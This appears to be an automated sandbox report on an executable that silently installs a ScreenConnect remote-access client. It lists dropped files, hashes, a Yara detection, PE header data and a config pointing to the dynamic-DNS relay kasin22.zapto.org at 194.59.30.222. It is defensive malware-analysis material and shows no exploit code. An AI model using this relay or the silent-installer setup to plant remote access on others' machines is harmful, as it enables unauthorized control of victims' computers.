                                                              Entropy (8bit):7.965045236153816
                                                              Encrypted:false
                                                              SSDEEP:196608:e53JLR3LGMLiW35V53JLR3LGMLL53JLR3LGMLW53JLR3LGMLl53JLR3LGML453Ju:STiuvTRTaT/TITCT7
                                                              MD5:70AE0D4F424B0E3F1C348FCD65B24508
                                                              SHA1:7734ACD61F9EE7441436E0BC549F92BEF0D7C238
                                                              SHA-256:4B17A0972E2C4E7275AE538839E35E6CBD2906E4DEFD7D94CECA2EDF3ADF1BD3
                                                              SHA-512:8A6D042FA031023C0BC855451780A70C6ED9DEA8951912F47AB72361522ADDD55ED6F4471C8C0E835857A9D2A00DDCB3891238D11B2BCEDFDD480A8BA9172B55
                                                              Malicious:false
                                                              Process:C:\Windows\System32\msiexec.exe
                                                              File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: Default, Author: ScreenConnect Software, Keywords: Default, Comments: Default, Template: Intel;1033, Revision Number: {C65824D8-9903-AFB4-B430-141024FF968F}, Create Time/Date: Tue Aug 13 23:22:20 2024, Last Saved Time/Date: Tue Aug 13 23:22:20 2024, Number of Pages: 200, Number of Words: 2, Name of Creating Application: Windows Installer XML Toolset (3.11.0.1701), Security: 2
                                                              Category:dropped
                                                              Size (bytes):13377536
                                                              Entropy (8bit):7.965045236153816
                                                              Encrypted:false
                                                              SSDEEP:196608:e53JLR3LGMLiW35V53JLR3LGMLL53JLR3LGMLW53JLR3LGMLl53JLR3LGML453Ju:STiuvTRTaT/TITCT7
                                                              MD5:70AE0D4F424B0E3F1C348FCD65B24508
                                                              SHA1:7734ACD61F9EE7441436E0BC549F92BEF0D7C238
                                                              SHA-256:4B17A0972E2C4E7275AE538839E35E6CBD2906E4DEFD7D94CECA2EDF3ADF1BD3
                                                              SHA-512:8A6D042FA031023C0BC855451780A70C6ED9DEA8951912F47AB72361522ADDD55ED6F4471C8C0E835857A9D2A00DDCB3891238D11B2BCEDFDD480A8BA9172B55
                                                              Malicious:false
                                                              Process:C:\Windows\System32\msiexec.exe
                                                              File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: Default, Author: ScreenConnect Software, Keywords: Default, Comments: Default, Template: Intel;1033, Revision Number: {C65824D8-9903-AFB4-B430-141024FF968F}, Create Time/Date: Tue Aug 13 23:22:20 2024, Last Saved Time/Date: Tue Aug 13 23:22:20 2024, Number of Pages: 200, Number of Words: 2, Name of Creating Application: Windows Installer XML Toolset (3.11.0.1701), Security: 2
                                                              Category:dropped
                                                              Size (bytes):13377536
                                                              Entropy (8bit):7.965045236153816
                                                              Encrypted:false
                                                              SSDEEP:196608:e53JLR3LGMLiW35V53JLR3LGMLL53JLR3LGMLW53JLR3LGMLl53JLR3LGML453Ju:STiuvTRTaT/TITCT7
                                                              MD5:70AE0D4F424B0E3F1C348FCD65B24508
                                                              SHA1:7734ACD61F9EE7441436E0BC549F92BEF0D7C238
                                                              SHA-256:4B17A0972E2C4E7275AE538839E35E6CBD2906E4DEFD7D94CECA2EDF3ADF1BD3
                                                              SHA-512:8A6D042FA031023C0BC855451780A70C6ED9DEA8951912F47AB72361522ADDD55ED6F4471C8C0E835857A9D2A00DDCB3891238D11B2BCEDFDD480A8BA9172B55
                                                              Malicious:false
                                                              Process:C:\Windows\System32\msiexec.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):423875
                                                              Entropy (8bit):6.5775294319822635
                                                              Encrypted:false
                                                              SSDEEP:6144:XuH2aCGw1ST1wQLdqv5uH2aCGw1ST1wQLdqvCl:XuH2anwohwQUv5uH2anwohwQUv8
                                                              MD5:084DB1ECADE8641008BB36B5920A9DCB
                                                              SHA1:4846BAAC94475D9B607EA91111AA12E87ACE9835
                                                              SHA-256:9700DFDD112E697300931B136B3414F4C5A7B2265999B82E116459B001B940AB
                                                              SHA-512:546A89AFB7929674A5C8E83814546643FAC8A553B4C240D47E77B14248C7A05C53C860BA60DA4049C5F380BB3E46322C3492B9655ED3DCB5546EE22AE497E77C
                                                              Malicious:false
                                                              Yara Hits:
                                                              • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Windows\Installer\MSIE7CB.tmp, Author: Joe Security
                                                              Preview:...@IXOS.@.....@.$qY.@.....@.....@.....@.....@.....@......&.{C65824D8-9903-AFB4-B430-141024FF968F}'.ScreenConnect Client (e6cb77284cf765aa)..setup.msi.@.....@.....@.....@......DefaultIcon..&.{C65824D8-9903-AFB4-B430-141024FF968F}.....@.....@.....@.....@.......@.....@.....@.......@....'.ScreenConnect Client (e6cb77284cf765aa)......Rollback..Rolling back action:..[1]..RollbackCleanup..Removing backup files..File: [1]...@.......@........ProcessComponents..Updating component registration.....@.....@.....@.]....&.{F7DC6ACE-2599-29C8-925C-5B3ACC994D1F}^.C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.dll.@.......@.....@.....@......&.{E75F3825-615D-A6C3-18A8-A81116BE1B2A}f.C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsBackstageShell.exe.@.......@.....@.....@......&.{1D30660B-8729-B08B-2523-3D6361F833F5}c.C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsFileManager.exe.@.......@.
                                                              Process:C:\Windows\System32\msiexec.exe
                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):207360
                                                              Entropy (8bit):6.573348437503042
                                                              Encrypted:false
                                                              SSDEEP:3072:X9LUHM7ptZ8UKOGw5vMWSuRy1YaDJkflQn3H+QDO/6Q+cxbr0qMG:XuH2aCGw1ST1wQLdqv
                                                              MD5:BA84DD4E0C1408828CCC1DE09F585EDA
                                                              SHA1:E8E10065D479F8F591B9885EA8487BC673301298
                                                              SHA-256:3CFF4AC91288A0FF0C13278E73B282A64E83D089C5A61A45D483194AB336B852
                                                              SHA-512:7A38418F6EE8DBC66FAB2CD5AD8E033E761912EFC465DAA484858D451DA4B8576079FE90FD3B6640410EDC8B3CAC31C57719898134F246F4000D60A252D88290
                                                              Malicious:false
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                              Process:C:\Windows\System32\msiexec.exe
                                                              File Type:Composite Document File V2 Document, Cannot read section info
                                                              Category:dropped
                                                              Size (bytes):20480
                                                              Entropy (8bit):1.162064330514013
                                                              Encrypted:false
                                                              SSDEEP:12:JSbX72FjyqcAGiLIlHVRpMh/7777777777777777777777777vDHFz3eAlp3Xl0G:JTcQI5cReo6F
                                                              MD5:F68017F50CB23A3D035022263684A99B
                                                              SHA1:3B1CB306A979A95692B880237BE891B5EAAB67AB
                                                              SHA-256:1C9610A2A17EA9B849027AAD5576D6976B851A74E37DC57A79434F531D008917
                                                              SHA-512:802FBF5AE7C00974D490C5AA6BB1C2F83CBC00A70ED8234803781226BEB4D4AF6B39F3462D541BCF02E6376B61E8C2107547A2BA4431AF28CE9687812E72EABB
                                                              Malicious:false
                                                              Process:C:\Windows\System32\msiexec.exe
                                                              File Type:Composite Document File V2 Document, Cannot read section info
                                                              Category:dropped
                                                              Size (bytes):20480
                                                              Entropy (8bit):1.8043005070624267
                                                              Encrypted:false
                                                              SSDEEP:48:j8PhpuRc06WX4EnT5/nd+qcq56AdujSifLgHW9dLDzV4xMygcuNoXSqfv+r2Adu8:Khp10nTzbpifTgHqdfqHgcNv9
                                                              MD5:6ABD73E50893FAFFCA4C15B16748C1C0
                                                              SHA1:082ED09595D4569CF22FEC4FA1FF840F229149DC
                                                              SHA-256:4B3597871B4508D1F46A08FCA672E8938F3157A0CAFB89302E1FEE0325765F73
                                                              SHA-512:4F20EE3A9CE1B37E5C74797DF77DBCDAE24646D409B75A959060A2653223314C9D6C6799256D7F8FC3666712CB71F5D125547FD29AA8F5FCCC292DF7166793E5
                                                              Malicious:false
                                                              Process:C:\Windows\System32\msiexec.exe
                                                              File Type:MS Windows icon resource - 3 icons, 16x16 with PNG image data, 16 x 16, 8-bit colormap, non-interlaced, 4 bits/pixel, 32x32 with PNG image data, 32 x 32, 1-bit colormap, non-interlaced, 4 bits/pixel
                                                              Category:dropped
                                                              Size (bytes):435
                                                              Entropy (8bit):5.289734780210945
                                                              Encrypted:false
                                                              SSDEEP:12:Kvv/7tghWPjScQZ/Ev/739Jgh5TZYR/v/71XfghNeZ:QOZZq9JOz0dONeZ
                                                              MD5:F34D51C3C14D1B4840AE9FF6B70B5D2F
                                                              SHA1:C761D3EF26929F173CEB2F8E01C6748EE2249A8A
                                                              SHA-256:0DD459D166F037BB8E531EB2ECEB2B79DE8DBBD7597B05A03C40B9E23E51357A
                                                              SHA-512:D6EEB5345A5A049A87BFBFBBBEBFBD9FBAEC7014DA41DB1C706E8B16DDEC31561679AAE9E8A0847098807412BD1306B9616C8E6FCFED8683B4F33BD05ADE38D1
                                                              Malicious:false
                                                              Process:C:\Windows\System32\msiexec.exe
                                                              File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):360001
                                                              Entropy (8bit):5.362983403783725
                                                              Encrypted:false
                                                              SSDEEP:1536:6qELG7gK+RaOOp3LCCpfmLgYI66xgFF9Sq8K6MAS2OMUHl6Gin327D22A26KgauY:zTtbmkExhMJCIpEl
                                                              MD5:BF8E7F1BB82C608161194EF90EBAE266
                                                              SHA1:3D33F7238F4D1A9981933E25C7F426999EC4EF07
                                                              SHA-256:FFC3083E99911B342183FDB71AA62C49A4B3270AA54C07666AD57C4A2531BCA7
                                                              SHA-512:1E34A65E069343E08563DF6D5572007A27D2E8EA0EB88107B95B95452CBCD0605613ADAA303DDFCEDC602D496663AEDEE1FFE0A214C77D9C1629F4404B73F2B1
                                                              Malicious:false
                                                              Preview:.To learn about increasing the verbosity of the NGen log files please see http://go.microsoft.com/fwlink/?linkid=210113..12/07/2019 14:54:22.458 [5488]: Command line: D:\wd\compilerTemp\BMT.200yuild.1bk\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe executeQueuedItems /nologo ..12/07/2019 14:54:22.473 [5488]: Executing command from offline queue: install "System.Runtime.WindowsRuntime.UI.Xaml, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=b77a5c561934e089, processorArchitecture=msil" /NoDependencies /queue:1..12/07/2019 14:54:22.490 [5488]: Executing command from offline queue: install "System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil" /NoDependencies /queue:3..12/07/2019 14:54:22.490 [5488]: Exclusion list entry found for System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil; it will not be installed..12/07/2019 14:54:22.490 [
                                                              Process:C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe
                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                              Category:modified
                                                              Size (bytes):562
                                                              Entropy (8bit):5.0370822274973674
                                                              Encrypted:false
                                                              SSDEEP:12:TMHdGGqq9yAas26K9YG6DLI4MWiNuGEAaORnYPENOl7vHv/vXbAa3xT:2dL9hK6E46YPnj3vH
                                                              MD5:9DC890F3119C59826520AE6C4353CEB9
                                                              SHA1:136180B62BF59AB1BF4252A6F611D5B49AECC74B
                                                              SHA-256:3E84D1345BFA59463355896A87223040858420101C5E106D46ECDB9494581002
                                                              SHA-512:7332C009A749BDBEBFFBA4B23CEB91398B7775C4E9B9CC11DDEF47CAF09BCB8BA30F0B4B834DAC50F3FFC1859551CA2DECC07DD17F1BB88CA76E39DE6421B052
                                                              Malicious:false
                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="HostToAddressMap" serializeAs="String">.. <value>kasin22.zapto.org=194.59.30.222-17%2f11%2f2024%2009%3a32%3a05</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>
                                                              Process:C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe
                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):562
                                                              Entropy (8bit):5.0370822274973674
                                                              Encrypted:false
                                                              SSDEEP:12:TMHdGGqq9yAas26K9YG6DLI4MWiNuGEAaORnYPENOl7vHv/vXbAa3xT:2dL9hK6E46YPnj3vH
                                                              MD5:9DC890F3119C59826520AE6C4353CEB9
                                                              SHA1:136180B62BF59AB1BF4252A6F611D5B49AECC74B
                                                              SHA-256:3E84D1345BFA59463355896A87223040858420101C5E106D46ECDB9494581002
                                                              SHA-512:7332C009A749BDBEBFFBA4B23CEB91398B7775C4E9B9CC11DDEF47CAF09BCB8BA30F0B4B834DAC50F3FFC1859551CA2DECC07DD17F1BB88CA76E39DE6421B052
                                                              Malicious:false
                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="HostToAddressMap" serializeAs="String">.. <value>kasin22.zapto.org=194.59.30.222-17%2f11%2f2024%2009%3a32%3a05</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>
                                                              Process:C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe
                                                              File Type:ASCII text, with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):1590
                                                              Entropy (8bit):5.363907225770245
                                                              Encrypted:false
                                                              SSDEEP:48:MxHKQ71qHGIs0HKEHiYHKGSI6oPtHTHhAHKKkhHNpv:iq+wmj0qECYqGSI6oPtzHeqKkhtpv
                                                              MD5:E88F0E3AD82AC5F6557398EBC137B0DE
                                                              SHA1:20D4BBBE8E219D2D2A0E01DA1F7AD769C3AC84DA
                                                              SHA-256:278AA1D32C89FC4CD991CA18B6E70D3904C57E50192FA6D882959EB16F14E380
                                                              SHA-512:CA6A7AAE873BB300AC17ADE2394232E8C782621E30CA23EBCE8FE65EF2E5905005EFD2840FD9310FBB20D9E9848961FAE2873B3879FCBC58F8A6074337D5802D
                                                              Malicious:false
                                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..2,"System.Deployment, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture
                                                              Process:C:\Windows\System32\msiexec.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):512
                                                              Entropy (8bit):0.0
                                                              Encrypted:false
                                                              SSDEEP:3::
                                                              MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                              SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                              SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                              SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                              Malicious:false
                                                              Process:C:\Windows\System32\msiexec.exe
                                                              File Type:Composite Document File V2 Document, Cannot read section info
                                                              Category:dropped
                                                              Size (bytes):32768
                                                              Entropy (8bit):1.423584461712653
                                                              Encrypted:false
                                                              SSDEEP:48:94RuVM+xFX4bT5hUWnd+qcq56AdujSifLgHW9dLDzV4xMygcuNoXSqfv+r2Aduj4:uRU4TX9bpifTgHqdfqHgcNv9
                                                              MD5:2DBF69E169109AB1EDEB334BFF1DD060
                                                              SHA1:EB7FB2EE13805EA51BEF0E1B2BB5CD395818FAE1
                                                              SHA-256:AFA429E1286439EEE66A09AFFF240862F6BA103B06FE4F3B3CD8C8D7A8A61E62
                                                              SHA-512:03F7E27F892D542C3E827C0A6F4A9E27AD259A9BAF1BFED8507866A86CC8140F507916FF71D25FDF2E3C272D722AB26B4CEB0A04F3D1965A253B71C69E8F892C
                                                              Malicious:false
                                                              Process:C:\Windows\System32\msiexec.exe
                                                              File Type:Composite Document File V2 Document, Cannot read section info
                                                              Category:dropped
                                                              Size (bytes):32768
                                                              Entropy (8bit):1.423584461712653
                                                              Encrypted:false
                                                              SSDEEP:48:94RuVM+xFX4bT5hUWnd+qcq56AdujSifLgHW9dLDzV4xMygcuNoXSqfv+r2Aduj4:uRU4TX9bpifTgHqdfqHgcNv9
                                                              MD5:2DBF69E169109AB1EDEB334BFF1DD060
                                                              SHA1:EB7FB2EE13805EA51BEF0E1B2BB5CD395818FAE1
                                                              SHA-256:AFA429E1286439EEE66A09AFFF240862F6BA103B06FE4F3B3CD8C8D7A8A61E62
                                                              SHA-512:03F7E27F892D542C3E827C0A6F4A9E27AD259A9BAF1BFED8507866A86CC8140F507916FF71D25FDF2E3C272D722AB26B4CEB0A04F3D1965A253B71C69E8F892C
                                                              Malicious:false
                                                              Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                              Process:C:\Windows\System32\msiexec.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):512
                                                              Entropy (8bit):0.0
                                                              Encrypted:false
                                                              SSDEEP:3::
                                                              MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                              SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                              SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                              SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                              Malicious:false
                                                              Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                              Process:C:\Windows\System32\msiexec.exe
                                                              File Type:Composite Document File V2 Document, Cannot read section info
                                                              Category:dropped
                                                              Size (bytes):20480
                                                              Entropy (8bit):1.8043005070624267
                                                              Encrypted:false
                                                              SSDEEP:48:j8PhpuRc06WX4EnT5/nd+qcq56AdujSifLgHW9dLDzV4xMygcuNoXSqfv+r2Adu8:Khp10nTzbpifTgHqdfqHgcNv9
                                                              MD5:6ABD73E50893FAFFCA4C15B16748C1C0
                                                              SHA1:082ED09595D4569CF22FEC4FA1FF840F229149DC
                                                              SHA-256:4B3597871B4508D1F46A08FCA672E8938F3157A0CAFB89302E1FEE0325765F73
                                                              SHA-512:4F20EE3A9CE1B37E5C74797DF77DBCDAE24646D409B75A959060A2653223314C9D6C6799256D7F8FC3666712CB71F5D125547FD29AA8F5FCCC292DF7166793E5
                                                              Malicious:false
                                                              Process:C:\Windows\System32\msiexec.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):512
                                                              Entropy (8bit):0.0
                                                              Encrypted:false
                                                              SSDEEP:3::
                                                              MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                              SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                              SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                              SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                              Malicious:false
                                                              Process:C:\Windows\System32\msiexec.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):512
                                                              Entropy (8bit):0.0
                                                              Encrypted:false
                                                              SSDEEP:3::
                                                              MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                              SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                              SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                              SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                              Malicious:false
                                                              Process:C:\Windows\System32\msiexec.exe
                                                              File Type:Composite Document File V2 Document, Cannot read section info
                                                              Category:dropped
                                                              Size (bytes):20480
                                                              Entropy (8bit):1.8043005070624267
                                                              Encrypted:false
                                                              SSDEEP:48:j8PhpuRc06WX4EnT5/nd+qcq56AdujSifLgHW9dLDzV4xMygcuNoXSqfv+r2Adu8:Khp10nTzbpifTgHqdfqHgcNv9
                                                              MD5:6ABD73E50893FAFFCA4C15B16748C1C0
                                                              SHA1:082ED09595D4569CF22FEC4FA1FF840F229149DC
                                                              SHA-256:4B3597871B4508D1F46A08FCA672E8938F3157A0CAFB89302E1FEE0325765F73
                                                              SHA-512:4F20EE3A9CE1B37E5C74797DF77DBCDAE24646D409B75A959060A2653223314C9D6C6799256D7F8FC3666712CB71F5D125547FD29AA8F5FCCC292DF7166793E5
                                                              Malicious:false
                                                              Process:C:\Windows\System32\msiexec.exe
                                                              File Type:Composite Document File V2 Document, Cannot read section info
                                                              Category:dropped
                                                              Size (bytes):32768
                                                              Entropy (8bit):1.423584461712653
                                                              Encrypted:false
                                                              SSDEEP:48:94RuVM+xFX4bT5hUWnd+qcq56AdujSifLgHW9dLDzV4xMygcuNoXSqfv+r2Aduj4:uRU4TX9bpifTgHqdfqHgcNv9
                                                              MD5:2DBF69E169109AB1EDEB334BFF1DD060
                                                              SHA1:EB7FB2EE13805EA51BEF0E1B2BB5CD395818FAE1
                                                              SHA-256:AFA429E1286439EEE66A09AFFF240862F6BA103B06FE4F3B3CD8C8D7A8A61E62
                                                              SHA-512:03F7E27F892D542C3E827C0A6F4A9E27AD259A9BAF1BFED8507866A86CC8140F507916FF71D25FDF2E3C272D722AB26B4CEB0A04F3D1965A253B71C69E8F892C
                                                              Malicious:false
                                                              Process:C:\Windows\System32\msiexec.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):32768
                                                              Entropy (8bit):0.06891007709577635
                                                              Encrypted:false
                                                              SSDEEP:6:2/9LG7iVCnLG7iVrKOzPLHKOzVFepvJQGyVky6l3X:2F0i8n0itFzDHFz3eAE3X
                                                              MD5:85F03523CAB70D9637CEE3FC5FC8ECB1
                                                              SHA1:D1F8E44B9D260C11070BA2E9A39D2A7F590E5564
                                                              SHA-256:B8277C29C1E3C3C4C2D15019689D5981F0406EF7ADE641C690283CE910CE3E51
                                                              SHA-512:F7D90C4EBE84CD2A526923EE7C9442CBC847F8C7A287528F234A12F5E803DFD05F0930CE8527969050E6A2F5B07A9BAD6438CDB06908C8EEE471A10918F6397D
                                                              Malicious:false
                                                              Process:C:\Windows\System32\msiexec.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):69632
                                                              Entropy (8bit):0.2363153163182469
                                                              Encrypted:false
                                                              SSDEEP:48:+UDBAdujS3qcq56AdujSifLgHW9dLDzV4xMygcuNoXSqfv+rMan:5xpifTgHqdfqHgcNv3
                                                              MD5:E4B00CBD93A896CD28D650014C8C8052
                                                              SHA1:2C8E503B43B26D19E43E59E394B06B98BF8AC273
                                                              SHA-256:A15516A2D3922418D88A0E69B8417FB073318916D2420E848E5FC58DE00656D4
                                                              SHA-512:3AC107E1E98E5F90F61B2C5EE24C249E83A237BF7F7383FBB5E9FFBB99370596752287C6CB36216593D6EBB70982DCFE6140943778E11731121606E6043CBC54
                                                              Malicious:false
                                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                              Entropy (8bit):7.422858587192067
                                                              TrID:
                                                              • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                              • Win32 Executable (generic) a (10002005/4) 49.97%
                                                              • Generic Win/DOS Executable (2004/3) 0.01%
                                                              • DOS Executable Generic (2002/1) 0.01%
                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                              File name:file.exe
                                                              File size:5'635'656 bytes
                                                              MD5:093b0062fbf8663736ced8f41859ff58
                                                              SHA1:20b26d4cc9e13c560bc1e86920f5965291cc4d7a
                                                              SHA256:64ca91a2446a8e567b24deea926bbdb34fd2dda221577787bbb62d07cbf0272d
                                                              SHA512:c23280c17f01b38975e6d5d5e0fcb618783535ec2f5fb11a7dcbfa662ef75fe41ac1653bf7ecb576763dbeee5f7d4ee0a18e9f4c6b761e976e6da30bda8c348f
                                                              SSDEEP:49152:jDex5xKkEJkGYYpT0+TFiH7efP0x58IJL+md3rHgDNMKLo8SsxG/XcW32gqkAfoO:R4s6efPQ53JLbd3LINMLaGUW39f0
                                                              TLSH:3546E111B3D995B9D0BF063CD87A52699A74BC048722C7AF57D4BD292D32BC04E323B6
                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........_..E>`.E>`.E>`.....O>`.....?>`.....]>`..Ee.`>`..Ed.T>`..Ec.Q>`.LF..A>`.[l..F>`.E>a.%>`..Ei.D>`..E..D>`..Eb.D>`.RichE>`........
                                                              Icon Hash:00928e8e8686b000
                                                              Entrypoint:0x4014ad
                                                              Entrypoint Section:.text
                                                              Digitally signed:true
                                                              Imagebase:0x400000
                                                              Subsystem:windows gui
                                                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                              Time Stamp:0x6377E6AC [Fri Nov 18 20:10:20 2022 UTC]
                                                              TLS Callbacks:
                                                              CLR (.Net) Version:
                                                              OS Version Major:5
                                                              OS Version Minor:1
                                                              File Version Major:5
                                                              File Version Minor:1
                                                              Subsystem Version Major:5
                                                              Subsystem Version Minor:1
                                                              Import Hash:9771ee6344923fa220489ab01239bdfd
                                                              Signature Valid:true
                                                              Signature Issuer:CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
                                                              Signature Validation Error:The operation completed successfully
                                                              Error Number:0
                                                              Not Before, Not After
                                                              • 17/08/2022 02:00:00 16/08/2025 01:59:59
                                                              Subject Chain
                                                              • CN="Connectwise, LLC", O="Connectwise, LLC", L=Tampa, S=Florida, C=US
                                                              Version:3
                                                              Thumbprint MD5:AAE704EC2810686C3BF7704E660AFB5D
                                                              Thumbprint SHA-1:4C2272FBA7A7380F55E2A424E9E624AEE1C14579
                                                              Thumbprint SHA-256:82B4E7924D5BED84FB16DDF8391936EB301479CEC707DC14E23BC22B8CDEAE28
                                                              Serial:0B9360051BCCF66642998998D5BA97CE
                                                              Instruction
                                                              call 00007F8E8CB883DAh
                                                              jmp 00007F8E8CB87E8Fh
                                                              push ebp
                                                              mov ebp, esp
                                                              push 00000000h
                                                              call dword ptr [0040D040h]
                                                              push dword ptr [ebp+08h]
                                                              call dword ptr [0040D03Ch]
                                                              push C0000409h
                                                              call dword ptr [0040D044h]
                                                              push eax
                                                              call dword ptr [0040D048h]
                                                              pop ebp
                                                              ret
                                                              push ebp
                                                              mov ebp, esp
                                                              sub esp, 00000324h
                                                              push 00000017h
                                                              call dword ptr [0040D04Ch]
                                                              test eax, eax
                                                              je 00007F8E8CB88017h
                                                              push 00000002h
                                                              pop ecx
                                                              int 29h
                                                              mov dword ptr [004148D8h], eax
                                                              mov dword ptr [004148D4h], ecx
                                                              mov dword ptr [004148D0h], edx
                                                              mov dword ptr [004148CCh], ebx
                                                              mov dword ptr [004148C8h], esi
                                                              mov dword ptr [004148C4h], edi
                                                              mov word ptr [004148F0h], ss
                                                              mov word ptr [004148E4h], cs
                                                              mov word ptr [004148C0h], ds
                                                              mov word ptr [004148BCh], es
                                                              mov word ptr [004148B8h], fs
                                                              mov word ptr [004148B4h], gs
                                                              pushfd
                                                              pop dword ptr [004148E8h]
                                                              mov eax, dword ptr [ebp+00h]
                                                              mov dword ptr [004148DCh], eax
                                                              mov eax, dword ptr [ebp+04h]
                                                              mov dword ptr [004148E0h], eax
                                                              lea eax, dword ptr [ebp+08h]
                                                              mov dword ptr [004148ECh], eax
                                                              mov eax, dword ptr [ebp-00000324h]
                                                              mov dword ptr [00414828h], 00010001h
                                                              Programming Language:
                                                              • [IMP] VS2008 SP1 build 30729
                                                              • [IMP] VS2008 build 21022
                                                               Name | Virtual Address | Virtual Size | Is in Section
                                                               IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
